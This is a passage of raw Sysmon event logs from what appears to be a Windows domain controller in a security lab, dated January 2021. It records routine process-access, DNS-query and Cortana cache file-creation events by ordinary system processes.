dows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.398{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+baba5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.305{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.305{59A5CD1D-93F9-6005-F204-00000000A301}42961312C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.305{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E56-6005-2A00-00000000A301}28644480C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E56-6005-2A00-00000000A301}28644480C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000012007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.330{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.usertrust.com0::ffff:151.139.128.14;C:\Windows\sysmon64.exe 22542200x800000000000000012006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.284{59A5CD1D-8E56-6005-2E00-00000000A301}2464pki.intel.com0type: 5 certificates.intel.com.edgesuite.net;type: 5 a243.d.akamai.net;::ffff:23.48.23.42;::ffff:23.48.23.29;C:\Windows\sysmon64.exe 11241100x800000000000000012005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-01-18 13:58:34.898 11241100x800000000000000012000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.898{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-01-18 13:58:34.898 11241100x800000000000000011995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.883{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-01-18 13:58:34.883 11241100x800000000000000011994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 